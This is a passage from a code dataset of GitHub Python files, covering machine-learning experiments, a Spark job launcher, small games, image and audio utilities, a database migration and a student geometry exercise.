Predict_Matrix_train[i]==train_label_RVFL[i]:\n            correct+=1\n    train_accuracy_NN.append(correct/len(train_label_RVFL))\n    print(test_accuracy_NN,train_accuracy_NN)\n\n\n\n\n    # Naive Bayes classifier\n\n    clf = GaussianNB()\n\n    Start = time.time()\n    clf.fit(train_data_RVFL,train_label_RVFL)\n    End = time.time()\n    print(\"NB training time\", End - Start)\n    temp=0\n    correct=0\n\n    Start = time.time()\n    Predict_Matrix_test=clf.predict(test_data_RVFL)\n\n\n    for i in range(len(test_label_RVFL)):\n        if Predict_Matrix_test[i]==test_label_RVFL[i]:\n            correct+=1\n    test_accuracy_NB.append(correct/len(test_label_RVFL))\n    End = time.time()\n    print(\"NB test time\", End - Start)\n    correct=0\n    Predict_Matrix_train=clf.predict(train_data_RVFL)\n    for i in range(len(train_label_RVFL)):\n        if Predict_Matrix_train[i]==train_label_RVFL[i]:\n            correct+=1\n    train_accuracy_NB.append(correct/len(train_label_RVFL))\n    print(test_accuracy_NB,train_accuracy_NB)\n\n\n\n    # Random forest (results are stored in the *_cart lists)\n    clf=RandomForestClassifier()\n    clf.fit(train_data_NBC,train_label_NBC)\n\n    temp=0\n    correct=0\n    Predict_Matrix_test=clf.predict(test_data_NBC)\n    for i in range(len(test_label_NBC)):\n        if Predict_Matrix_test[i]==test_label_NBC[i]:\n            correct+=1\n    test_accuracy_cart.append(correct/len(test_label_NBC))\n\n
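    # Training-set accuracy for the random forest, to compare against the test accuracy.\n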
    correct=0\n    Predict_Matrix_train=clf.predict(train_data_NBC)\n    for i in range(len(train_label_NBC)):\n        if Predict_Matrix_train[i]==train_label_NBC[i]:\n            correct+=1\n    train_accuracy_cart.append(correct/len(train_label_NBC))\n    print(test_accuracy_cart,train_accuracy_cart)\n\n    # Decision tree (results are stored in the *_rt lists)\n    clf=tree.DecisionTreeClassifier()\n    clf.fit(train_data_NBC,train_label_NBC)\n    temp=0\n    correct=0\n    Predict_Matrix_test=clf.predict(test_data_NBC)\n    for i in range(len(test_label_NBC)):\n        if Predict_Matrix_test[i]==test_label_NBC[i]:\n            correct+=1\n    test_accuracy_rt.append(correct/len(test_label_NBC))\n\n    correct=0\n    Predict_Matrix_train=clf.predict(train_data_NBC)\n    for i in range(len(train_label_NBC)):\n        if Predict_Matrix_train[i]==train_label_NBC[i]:\n            correct+=1\n    train_accuracy_rt.append(correct/len(train_label_NBC))\n    print(test_accuracy_rt,train_accuracy_rt)\n\n\n\narr_mean_train_svc = np.mean(train_accuracy_svc)\narr_std_train_svc = np.std(train_accuracy_svc)\narr_mean_test_svc = np.mean(test_accuracy_svc)\narr_std_test_svc = np.std(test_accuracy_svc)\n\nprint(\"svc test set mean and std:\", arr_mean_test_svc, arr_std_test_svc)\nprint(\"svc training set mean and std:\", arr_mean_train_svc, arr_std_train_svc)\n\narr_mean_train_NN = np.mean(train_accuracy_NN)\narr_std_train_NN = np.std(train_accuracy_NN)\narr_mean_test_NN = np.mean(test_accuracy_NN)\narr_std_test_NN = np.std(test_accuracy_NN)\n\nprint(\"NN test set mean and std:\", arr_mean_test_NN, arr_std_test_NN)\nprint(\"NN training set mean and std:\", arr_mean_train_NN, arr_std_train_NN)\n\narr_mean_train_NB = np.mean(train_accuracy_NB)\narr_std_train_NB = np.std(train_accuracy_NB)\narr_mean_test_NB = np.mean(test_accuracy_NB)\narr_std_test_NB = np.std(test_accuracy_NB)\n\nprint(\"NB test set mean and std:\", arr_mean_test_NB, arr_std_test_NB)\nprint(\"NB training set mean and std:\", arr_mean_train_NB, arr_std_train_NB)\n\narr_mean_train_cart = np.mean(train_accuracy_cart)\narr_std_train_cart = np.std(train_accuracy_cart)\narr_mean_test_cart = np.mean(test_accuracy_cart)\narr_std_test_cart = np.std(test_accuracy_cart)\n\nprint(\"cart test set mean and std:\", arr_mean_test_cart, arr_std_test_cart)\nprint(\"cart training set mean and std:\", arr_mean_train_cart, arr_std_train_cart)\n\narr_mean_train_rt = np.mean(train_accuracy_rt)\narr_std_train_rt = np.std(train_accuracy_rt)\narr_mean_test_rt = np.mean(test_accuracy_rt)\narr_std_test_rt = np.std(test_accuracy_rt)\n\nprint(\"rt test set mean and std:\", arr_mean_test_rt, arr_std_test_rt)\nprint(\"rt training set mean and std:\", arr_mean_train_rt, arr_std_train_rt)\n","repo_name":"ouguiliang110/NaiveBayesNetCheck","sub_path":"NBC-RVFC 集成算法/对比实验算法.py","file_name":"对比实验算法.py","file_ext":"py","file_size_in_byte":7663,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"70198685549","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\n\nimport aqueduct as aq\n\nNAME = \"succeed_complex\"\nDESCRIPTION = \"\"\"* Workflows Page: should succeed.\n* Workflow Details Page: everything should be green.\n* Data Page: pred_ensemble artifact should appear.\"\"\"\n\n\n@aq.op(requirements=[\"numpy\"])\ndef log_featurize(cust: pd.DataFrame) -> pd.DataFrame:\n    features = cust.copy()\n    skip_cols = [\"cust_id\", \"using_deep_learning\", \"using_dbt\"]\n\n    for col in features.columns.difference(skip_cols):\n        features[\"log_\" + col] = np.log(features[col] + 1.0)\n\n    return features.drop(columns=\"cust_id\")\n\n\ndef deploy(client, integration):\n    customers_table = pd.read_csv(\n        
\"https://raw.githubusercontent.com/aqueducthq/aqueduct/main/examples/churn_prediction/data/customers.csv\"\n )\n churn_table = pd.read_csv(\n \"https://raw.githubusercontent.com/aqueducthq/aqueduct/main/examples/churn_prediction/data/churn_data.csv\"\n )\n features_table = log_featurize.local(customers_table)\n\n linear_model = LogisticRegression(max_iter=10000)\n linear_model.fit(features_table, churn_table[\"churn\"])\n decision_tree_model = DecisionTreeClassifier(max_depth=10, min_samples_split=3)\n decision_tree_model.fit(features_table, churn_table[\"churn\"])\n\n @aq.op(requirements=[\"scikit-learn\"])\n def predict_linear(features_table):\n return pd.DataFrame({\"linear\": linear_model.predict_proba(features_table)[:, 1]})\n\n @aq.op(requirements=[\"scikit-learn\"])\n def predict_tree(features_table):\n return pd.DataFrame({\"tree\": decision_tree_model.predict_proba(features_table)[:, 1]})\n\n @aq.op(requirements=[])\n def predict_ensemble(customers_table, linear_pred_table, tree_pred_table):\n return customers_table.assign(\n prob_churn=linear_pred_table.join(tree_pred_table).mean(axis=1)\n )\n\n warehouse = client.resource(name=integration)\n customers_table = warehouse.sql(query=\"SELECT * FROM customers;\")\n features_table = log_featurize(customers_table)\n linear_pred_table = predict_linear(features_table)\n tree_pred_table = predict_tree(features_table)\n churn_table = predict_ensemble(customers_table, linear_pred_table, tree_pred_table)\n\n @aq.check(description=\"Ensuring valid probabilities.\", requirements=[])\n def valid_probabilities(df: pd.DataFrame):\n return (df[\"prob_churn\"] >= 0) & (df[\"prob_churn\"] <= 1)\n\n valid_probabilities(churn_table)\n avg_pred_churn_metric = churn_table.mean(\"prob_churn\")\n avg_pred_churn_metric.bound(lower=0.1)\n avg_pred_churn_metric.bound(upper=0.3)\n avg_pred_churn_metric.bound(upper=0.4, severity=\"error\")\n warehouse.save(churn_table, \"pred_churn\", aq.LoadUpdateMode.REPLACE)\n client.publish_flow(\n name=NAME,\n description=DESCRIPTION,\n artifacts=[churn_table, avg_pred_churn_metric],\n schedule=aq.hourly(),\n )\n","repo_name":"aqueducthq/aqueduct","sub_path":"manual_qa_tests/workflows/succeed_complex.py","file_name":"succeed_complex.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","stars":488,"dataset":"github-code","pt":"37"} +{"seq_id":"24928825471","text":"import setuptools\n\nwith open('README.md') as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name='streamside',\n version='0.5',\n scripts=[],\n author='Jinho D. 
Choi',\n    author_email='jinho.choi@emory.edu',\n    description='Meaning Representation Annotation Toolkit',\n    long_description=long_description,\n    long_description_content_type='text/markdown',\n    url='https://github.com/emorynlp/StreamSide',\n    packages=setuptools.find_packages(),\n    install_requires=[\n        'PyQt5==5.15.4'\n    ],\n    classifiers=[\n        'Programming Language :: Python :: 3',\n        'License :: OSI Approved :: Apache Software License',\n        'Operating System :: OS Independent',\n    ],\n    package_data={'streamside': ['resources/*/*.json']},\n    include_package_data=True\n    )","repo_name":"emorynlp/StreamSide","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"}
{"seq_id":"11873001770","text":"import cv2\nimport numpy as np\n\ndef cv2show(name: str, img):\n    cv2.imshow(name, img)\n    cv2.waitKey(0)\n\nif __name__ == '__main__':\n    img1 = cv2.imread(r'./1.jpg')\n    img1_gray = cv2.cvtColor(img1,cv2.COLOR_BGR2GRAY)\n    cv2show('img1',img1)\n    print(img1.shape)\n    # I. Find contours\n    # Binarize the image: gray value > 127 -> 255, gray value < 127 -> 0\n    ret, thresh = cv2.threshold(img1_gray, 127, 255, cv2.THRESH_BINARY)\n    cv2show('Binarize', thresh)\n\n    # Find the contours of the binarized image\n    contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)\n    # contours (list describing each contour), hierarchy (nesting levels, not important here)\n    \n    # With the contours list in hand, draw them directly with drawContours\n    cv2.drawContours(img1, contours, -1 ,( 0, 255, 255) , 1) # (src, contours , index of contours (-1 to draw all contours), (B,G,R), thickness)\n    cv2show('Contours',img1)\n\n    # II. Estimate an approximate contour (only one contour from the contours list is approximated and drawn)\n    one_contour = contours[21] # take a single contour out of the list\n    epsilon = 0.1 * cv2.arcLength(one_contour,True) # arcLength gives the contour perimeter; tuning the threshold epsilon controls how close the approximation is\n    print('Perimeter: ', cv2.arcLength(one_contour,True))\n    approx = cv2.approxPolyDP(one_contour, epsilon, True)\n    cv2.drawContours(img1, [approx], -1 ,( 255, 255, 0) , 2)\n    cv2show('Contours vs Approx Contours',img1)","repo_name":"joshsmiththenoob/OpenCV_Image_Processing","sub_path":"OpenCV_contour_approximation.py","file_name":"OpenCV_contour_approximation.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"30658006134","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nage = 22\ncount = 0\nwhile count < 10:\n    print('attempt', count)\n    if count < 3:\n        guess_num = int(input(\"input your guess num:\"))\n        if guess_num == age:\n            print(\"Congratulations! you got it.\")\n            break # jump all loop\n        elif guess_num > age:\n            print(\"Think smaller!\")\n        else:\n            print(\"Think Big....\")\n        count += 1\n    else:\n
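        # Offer a reset after three wrong guesses; count = 0 restarts the attempt counter.\n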
        #print(\"too many attempts....bye\")\n        #break\n        continue_confirm = input(\"Do you want to continue because you are stupid:\")\n        if continue_confirm == 'y':\n            count = 0\n            print('attempts reset', count)\n        else:\n            print(\"bye\")\n            break\n\n\n","repo_name":"pangguoping/python-study","sub_path":"day1/guess_agev3.py","file_name":"guess_agev3.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"3840726488","text":"import pandas as pd\n\n\ndef run(simulation_time_steps, r0, recovering_rate, exposure_rate, death_rate, death_proportion_rate,susceptible, exposed, infected, recovered, dead, drop_midsteps: bool=True) -> pd.DataFrame:\n    \"\"\"\n    Run all experiments and return their output on the dataset column.\n    Each line represents an iteration of the parameter-sweep combinations.\n    \"\"\"\n    # The following imports NEED to be in the exact order\n    from cadCAD.engine import ExecutionMode, ExecutionContext, Executor\n\n    # Simulation configs, input any new simulations here\n    from covid_19_seird import config\n\n    #from {new_simulation} import config\n\n    from cadCAD import configs\n    config.get_config(simulation_time_steps, r0, recovering_rate, exposure_rate, death_rate, death_proportion_rate,susceptible, exposed, infected, recovered, dead)\n    exec_mode = ExecutionMode()\n    multi_proc_ctx = ExecutionContext(context=exec_mode.multi_proc)\n    run = Executor(exec_context=multi_proc_ctx, configs=configs)\n    results = pd.DataFrame()\n    i = 0\n    for raw_result, _ in run.execute():\n        params = configs[i].sim_config['M']\n        result_record = pd.DataFrame.from_records([tuple([i for i in params.values()])], columns=list(params.keys()))\n\n        df = pd.DataFrame(raw_result)\n        # keep only last substep of each timestep\n        if drop_midsteps:\n            max_substep = max(df.substep)\n            is_droppable = (df.substep!=max_substep)&(df.substep!=0)\n            df.drop(df[is_droppable].index, inplace=True)\n\n        result_record['dataset'] = [df]\n        results = results.append(result_record)\n        i += 1\n    return results.reset_index()","repo_name":"marthendalnunes/covid-simulation","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"}
{"seq_id":"27882900081","text":"\"\"\"update-sf133-datatypes\n\nRevision ID: 5a9051f9bfc5\nRevises: a0a4f1ef56ae\nCreate Date: 2016-08-11 11:44:49.640398\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '5a9051f9bfc5'\ndown_revision = 'a0a4f1ef56ae'\nbranch_labels = None\ndepends_on = None\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade(engine_name):\n    globals()[\"upgrade_%s\" % engine_name]()\n\n\ndef downgrade(engine_name):\n    globals()[\"downgrade_%s\" % engine_name]()\n\n\ndef upgrade_data_broker():\n    op.alter_column('sf_133', 'fiscal_year', nullable=False)\n    op.execute('ALTER TABLE sf_133 ALTER COLUMN fiscal_year TYPE INTEGER USING (fiscal_year::integer)')\n\n    op.alter_column('sf_133', 'period', nullable=False)\n    op.execute('ALTER TABLE sf_133 ALTER COLUMN period TYPE INTEGER USING (period::integer)')\n\n\ndef downgrade_data_broker():\n    op.alter_column('sf_133', 'period',\n                    existing_type=sa.Integer(),\n                    type_=sa.TEXT(),\n                    nullable=True)\n    op.alter_column('sf_133', 'fiscal_year',\n
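                    # restore the original nullable TEXT column\n                    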
existing_type=sa.Integer(),\n type_=sa.TEXT(),\n nullable=True)\n\n","repo_name":"fedspendingtransparency/data-act-broker-backend","sub_path":"dataactcore/migrations/versions/5a9051f9bfc5_update_sf133_datatypes.py","file_name":"5a9051f9bfc5_update_sf133_datatypes.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"37"} +{"seq_id":"28312762078","text":"from turtle import Screen\nfrom paddle import Paddle\nfrom ball import Ball\nfrom scoreboard import Scoreboard\nimport time\nscreen= Screen()\nscreen.setup(width=800, height= 600)\nscreen.bgcolor(\"black\")\nscreen.title(\"Pong\")\npaddle=Paddle((350,0))\npaddle2=Paddle((-350,0))\nball=Ball(1)\nscreen.tracer(0)\nscoreL=Scoreboard((-200,250))\nscoreR=Scoreboard((200,250))\n\n\n\nscreen.listen()\nscreen.onkey(paddle.goUp,\"Up\")\nscreen.onkey(paddle.goDown,\"Down\")\nscreen.onkey(paddle2.goUp,\"w\")\nscreen.onkey(paddle2.goDown,\"s\")\ngameLive=True\nwhile gameLive:\n time.sleep(ball.movespeed)\n screen.update()\n ball.moveBall()\n if ball.ycor()>=280 or ball.ycor()<=-280:\n ball.bounce()\n if ball.distance(paddle) <60 and ball.xcor()>=340:\n ball.hit()\n if ball.distance(paddle2) <60 and ball.xcor()<=-340:\n ball.hit()\n if ball.xcor()>=420:\n scoreL.scorePoint()\n ball=Ball(-1)\n if ball.xcor()<=-420:\n scoreR.scorePoint()\n ball=Ball(1)\n\n\nscreen.exitonclick()\n","repo_name":"gonzalocdlp/Python_Projects","sub_path":"21Pong/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75129332267","text":"import argparse\nimport configparser\nimport subprocess\nimport os\nimport sys\nimport logging\nimport zipfile\nimport shutil\n\nfrom backbone_pyspark_deploy.arg_parser import ArgParser\nfrom backbone_pyspark_deploy.logger import create_logger\n\n\ndef set_env(key, value):\n \"\"\"\n\n :param key:\n :param value:\n :return:\n \"\"\"\n\n if os.getenv(key) is None:\n if value is None:\n sys.exit(-1)\n else:\n os.environ[key] = value\n\n return os.getenv(key)\n\n\ndef main():\n \"\"\"\n Entry point for .pex\n\n :return: spark-submit\n \"\"\"\n\n # ------------------------------------------------------------------------------------------------------------------\n # CONFIGURATION FILES default values\n\n CUR_DIR = os.getcwd()\n\n # ------------------------------------------------------------------------------------------------------------------\n # PARSE ARGUMENTS\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--properties\", metavar=\"FILE\", required=True, help=\"configuration file .ini\")\n parser.add_argument(\"--params\", metavar=\"FILE\", required=True, help=\"parameters file .json\")\n\n parser.add_argument(\"--predict\", action=\"store_true\",\n help=\"train model (--predict not present [default]) or make prediction (--predict)\")\n\n parser.add_argument(\"--spark-home\", metavar=\"SPARK_HOME\", help=\"Path to SPARK_HOME\", required=False)\n parser.add_argument(\"--master\", metavar=\"SPARK MASTER\", help=\"Spark master\", default=None)\n\n parser.add_argument(\"--deploy-mode\", metavar=\"DEPLOY MODE\", choices=[\"cluster\", \"client\"], help=\"Spark deploy mode\",\n default=None)\n\n parser.add_argument(\"--num-executors\", metavar=\"\", help=\"Number of executors (ex: 2)\", default=None)\n parser.add_argument(\"--executor-memory\", metavar=\"\", help=\"Executor memory (ex: 8G)\", default=None)\n 
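# The remaining flags mirror spark-submit's own option names; unset values fall back to the .ini file.\n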
    parser.add_argument(\"--executor-cores\", metavar=\"\", help=\"Executor cores (ex: 8)\", default=None)\n    parser.add_argument(\"--py-files\", metavar=\"PKG\", help=\"Path to .pex file\", default=None)\n    parser.add_argument(\"--name\", metavar=\"\", help=\"Application name\", default=None)\n\n    parser.add_argument(\"--log-path\", metavar=\"FILE\", help=\"Path to log file\", default=None)\n\n    args = parser.parse_args()\n\n    # Load run_config.ini file\n    runconf = configparser.ConfigParser()\n    runconf.read(args.properties)\n\n    arg_parser_ini = ArgParser(args=vars(args), config_file=runconf)\n\n    # logger\n    log_path = arg_parser_ini.arg_parse(argument_key=\"log_path\", config_section=\"logging\", config_key=\"log-path\")\n    logger = create_logger(name=\"backbone_pyspark_deploy\", level=logging.DEBUG, log_file_path=log_path)\n\n    # spark-home\n    spark_home = arg_parser_ini.arg_parse(argument_key=\"spark_home\", config_section=\"spark-cli\", config_key=\"spark-home\")\n    set_env(\"SPARK_HOME\", spark_home)\n\n    logger.debug(\"SPARK HOME: {}\".format(os.getenv(\"SPARK_HOME\")))\n\n    # master\n    master = arg_parser_ini.arg_parse(argument_key=\"master\", config_section=\"spark-cli\", config_key=\"master\")\n    logger.debug(\"Master parameter: {}\".format(master))\n\n    # deploy-mode\n    deploy_mode = arg_parser_ini.arg_parse(argument_key=\"deploy_mode\", config_section=\"spark-cli\",\n                                           config_key=\"deploy-mode\")\n    logger.debug(\"Deploy mode parameter: {}\".format(deploy_mode))\n\n    # num-executors\n    num_executors = arg_parser_ini.arg_parse(argument_key=\"num_executors\", config_section=\"spark-cli\",\n                                             config_key=\"num-executors\")\n    logger.debug(\"Number executors parameter: {}\".format(num_executors))\n\n    # executor-memory\n    executor_memory = arg_parser_ini.arg_parse(argument_key=\"executor_memory\", config_section=\"spark-cli\",\n                                               config_key=\"executor-memory\")\n    logger.debug(\"Executor memory parameter: {}\".format(executor_memory))\n\n    # executor-cores\n    executor_cores = arg_parser_ini.arg_parse(argument_key=\"executor_cores\", config_section=\"spark-cli\",\n                                              config_key=\"executor-cores\")\n    logger.debug(\"Executor cores parameter: {}\".format(executor_cores))\n\n    # py-files\n    py_files = arg_parser_ini.arg_parse(argument_key=\"py_files\", config_section=\"spark-cli\", config_key=\"py-files\")\n    logger.debug(\"Py files parameter: {}\".format(py_files))\n\n    # name\n    name = arg_parser_ini.arg_parse(argument_key=\"name\", config_section=\"spark-cli\", config_key=\"name\")\n    logger.debug(\"Name parameter: {}\".format(name))\n\n    zip_list = os.listdir(os.path.join(spark_home, \"python\", \"lib\"))\n\n    sys.path.extend([os.path.join(spark_home, \"python\", \"lib\", zip_file) for zip_file in zip_list])\n\n    # ------------------------------------------------------------------------------------------------------------------\n    # UNZIP PEX\n\n    pex = sys.argv[0]\n    logger.debug(\"PEX: {}\".format(pex))\n\n    zipper = zipfile.ZipFile(pex)\n    zipper.extractall(path=os.path.join(CUR_DIR, \".backbone_pyspark_deploy\"))\n\n    # ------------------------------------------------------------------------------------------------------------------\n    # SPARK SUBMIT\n\n    backbone_pyspark_egg = \"\"\n    egg_list = os.listdir(os.path.join(CUR_DIR, \".backbone_pyspark_deploy\", \".deps\"))\n    logger.debug(\"egg-list: {}\".format(str(egg_list)))\n    py_files = (\"\" if py_files is None else py_files)\n\n
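    # Zip each unpacked .deps egg so it can be shipped to the executors via --py-files.\n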
    for egg in egg_list:\n        zipped = shutil.make_archive(base_name=egg, format=\"zip\",\n                                     root_dir=os.path.join(CUR_DIR, \".backbone_pyspark_deploy\", \".deps\", egg))\n        logger.debug(\"zipped: {}\".format(zipped))\n        if \"backbone_pyspark_deploy\" in egg:\n            backbone_pyspark_egg = egg\n            logger.debug(\"backbone_pyspark_egg: {}\".format(backbone_pyspark_egg))\n        py_files += \",\" + os.path.join(CUR_DIR, \".backbone_pyspark_deploy\", \".deps\", zipped)\n    py_files = py_files.strip(\",\")\n\n    spark_conf_list = arg_parser_ini.spark_conf_list()\n\n    logger.debug(\"--py-files: {}\".format(py_files))\n\n    config_files = args.properties + \",\" + args.params + \",\" + os.path.join(spark_home, \"conf\", \"hive-site.xml\")\n\n    logger.debug(\"--files: {}\".format(config_files))\n\n    logger.debug(\"--params: {}\".format(args.params))\n\n    logger.debug(\"--predict: {}\".format(args.predict))\n\n    logger.debug(\"--log-path: {}\".format(log_path))\n\n    spark_submit = os.path.join(spark_home, \"bin\", \"spark-submit\")\n\n    predict = int(args.predict)\n\n    params = (os.path.join(args.params) if deploy_mode == \"cluster\" else args.params)\n\n    cmd = [\n        spark_submit,\n        \"--master\", master,\n        \"--deploy-mode\", deploy_mode,\n        \"--num-executors\", num_executors,\n        \"--executor-memory\", executor_memory,\n        \"--executor-cores\", executor_cores,\n        \"--name\", name,\n        \"--files\", config_files,\n        \"--py-files\", py_files\n    ] + spark_conf_list + \\\n    [\n        os.path.join(CUR_DIR, \".backbone_pyspark_deploy\", \".deps\",\n                     backbone_pyspark_egg, \"backbone_pyspark_deploy\", \"driver.py\"),\n        \"--params\", params,\n        \"--predict\", str(predict),\n        \"--log-path\", log_path\n    ]\n\n    logger.debug(\"cmd spark-submit: {}\".format(str(cmd)))\n\n    subprocess.run(cmd)\n\n\nif __name__ == \"__main__\":\n    try:\n        main()\n    except Exception:\n        logging.exception(\"Error in main\")\n\n\n","repo_name":"giulbia/backbone_pyspark_deploy","sub_path":"backbone_pyspark_deploy/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7503,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
{"seq_id":"13080618091","text":"from typing import List\n\n# O(n^2) dynamic programming\ndef LIS(nums: List[int]) -> int:\n    if not nums:\n        return 0\n    dp = [1] * len(nums)\n    for i in range(1, len(nums)):\n        for j in range(i):\n            if nums[j] < nums[i]:\n                dp[i] = max(dp[i], dp[j] + 1)\n    return max(dp)\n\nprint(LIS([10,9,2,5,3,7,101,18]))\n\n\n# lower bound\n\nclass Solution():\n    def lengthOfLIS(self, nums: List[int]) -> int:\n        if not nums:\n            return 0\n        seq = []\n        for n in nums:\n            p = self.lower_bound(seq, n)\n            if p == len(seq):\n                seq.append(n)\n            else:\n                seq[p] = n\n\n        return len(seq)\n\n    def lower_bound(self, nums: List[int], target: int) -> int:\n        l, r = 0, len(nums)\n\n        while l < r:\n            mid = (l + r) // 2\n\n            if nums[mid] >= target:\n                r = mid\n            else:\n                l = mid + 1\n\n        return l\n\ns = Solution()\n\nprint(s.lengthOfLIS([10,9,2,5,3,7,101,18]))\n","repo_name":"alfmunny/coding-practice","sub_path":"300.py","file_name":"300.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"72181809387","text":"from qrcode.image.base import BaseImage\nfrom qrcode import make as makeqr\nfrom PyQt5.QtGui import QPixmap, QImage, QPainter\nfrom PyQt5.QtCore import Qt\n\nclass PixmapImage(BaseImage):\n    \"\"\"\n    A way to create Qt-Compatible qr codes and turn them to pixmaps\n    \"\"\"\n    def __init__(self, border, width, box_size):\n        self.border = border\n        self.width = width\n        self.box_size = box_size\n        size = (width + border * 2) * box_size\n        self._image = QImage(\n            size, size, 
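# 16-bit RGB is plenty for a black-and-white QR bitmap\n            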
QImage.Format_RGB16)\n self._image.fill(Qt.white)\n\n def pixmap(self):\n return QPixmap.fromImage(self._image)\n\n def drawrect(self, row, col):\n painter = QPainter(self._image)\n painter.fillRect(\n (col + self.border) * self.box_size,\n (row + self.border) * self.box_size,\n self.box_size, self.box_size,\n Qt.black)\n\n def save(self, stream, kind=None):\n pass\n\ndef genqrpixmap(data: str):\n \"\"\"\n Creates a qr pixmap with the given data\n \"\"\"\n return makeqr(data, image_factory=PixmapImage).pixmap().scaled(150,150)","repo_name":"giorgiolongo/SpaghettiQueue","sub_path":"spaghettiqueue/qr.py","file_name":"qr.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"17268181602","text":"import pandas as pd\nimport numpy as np\n\n\ndef envelope(signal, rate, threshold):\n mask = []\n y = pd.Series(signal).apply(np.abs)\n y_mean = y.rolling(window=int(rate/10), min_periods=1, center=True).mean()\n for mean in y_mean:\n if mean > threshold:\n mask.append(True)\n else:\n mask.append(False)\n\n return mask\n\n\ndef calc_fft(signal, rate):\n n = len(signal)\n freq = np.fft.rfftfreq(n, d=1 / rate)\n Y = abs(np.fft.rfft(signal) / n)\n # print(\"======================================\")\n # print(Y)\n # print(\"======================================\")\n # print(freq)\n return Y, freq\n","repo_name":"isurusamarasekara/Speech-Emotion-Recognition","sub_path":"back_end/calculations.py","file_name":"calculations.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4196984705","text":"\"\"\"Recomendaciones:\n - Recuerde almacenar las respuestas tal como se pide en cada ejercicio\n - Se resuelve de manera individual, la copia será anulada.\n - Muestre sus procedimientos de manera clara\"\"\"\n\n# nombre_completo = \"Jhanth Carlo Castillo Perez\" #Por favor ingrese su nombre en las comillas\n\n#------------------------ EJERCICIO 1 --------------------------------\n\"\"\"\nCree los siguientes rangos (tipo range()): \n rango1 => 334, 331, 328, 325, ... 4, 1\n rango2 => -5,-3,-1, 1, 3, 5, ... 999\n rango3 => -50, -55, -60, -65, -70, ... -195, -200\nDespués de obtener los rangos, almacenelos de la siguiente manera:\nlistaDeRangos = [rango1, rango2, rango3]\n\"\"\"\nprint(\"\\n----- EJERCICIO 1 -----\")\n\nrango1= range(334, 0,-3)\nrango2= range(-5, 1000, 2)\nrango3= range(-50, -201, -5)\n\nlistaDeRangos = [rango1, rango2, rango3]\nprint(listaDeRangos)\n\n#------------------------ EJERCICIO 2 --------------------------------\n\"\"\"\nDados los siguientes puntos geométricos:\n\"P1\" ==> (2, 2, 3) \"P6\" ==> (1, 0.5, 1)\n\"P2\" ==> (2, 3, 4) \"P7\" ==> (3, 2, 0.5)\n\"P3\" ==> (1, 1, 3) \"P8\" ==> (3, 1, 2)\n\"P4\" ==> (0.5, 0.5, 2) \"P9\" ==> (0, 0, 0)\n\"P5\" ==> (1, 2, 1) \"P10\" ==> (2, 0, 0.5) \nDetermine el par de puntos que se encuentran más cercanos.\nAlmacene la respuesta en un string llamado parCercano. 
Ejemplo:\nparCercano = \"P2-P3\" \n\"\"\"\nprint(\"\\n----- EJERCICIO 2 -----\")\n\n\"distancia = ((x1-x2)**2 + (y1-y2)**2 + (z1-z2)**2)**(1/2)\"\n\n# Coordenadas de los diez puntos.\npuntos = {\"P1\": (2, 2, 3), \"P2\": (2, 3, 4), \"P3\": (1, 1, 3), \"P4\": (0.5, 0.5, 2),\n          \"P5\": (1, 2, 1), \"P6\": (1, 0.5, 1), \"P7\": (3, 2, 0.5), \"P8\": (3, 1, 2),\n          \"P9\": (0, 0, 0), \"P10\": (2, 0, 0.5)}\n\nnombres = list(puntos)\nparCercano = \"\"\nGeodesica = None\n
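# Se recorren todas las parejas posibles de puntos y se conserva la distancia minima.\n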
parCercano=\"P1-P5\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D1_6):\n parCercano=\"P1-P6\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D1_7):\n parCercano=\"P1-P7\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D1_8):\n parCercano=\"P1-P8\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D1_9):\n parCercano=\"P1-P9\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D1_10):\n parCercano=\"P1-P10\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n\nif Geodesica==(min(list_D2)):\n if Geodesica==(D2_3):\n parCercano=\"P2-P3\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D2_4):\n parCercano=\"P2-P4\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D2_5):\n 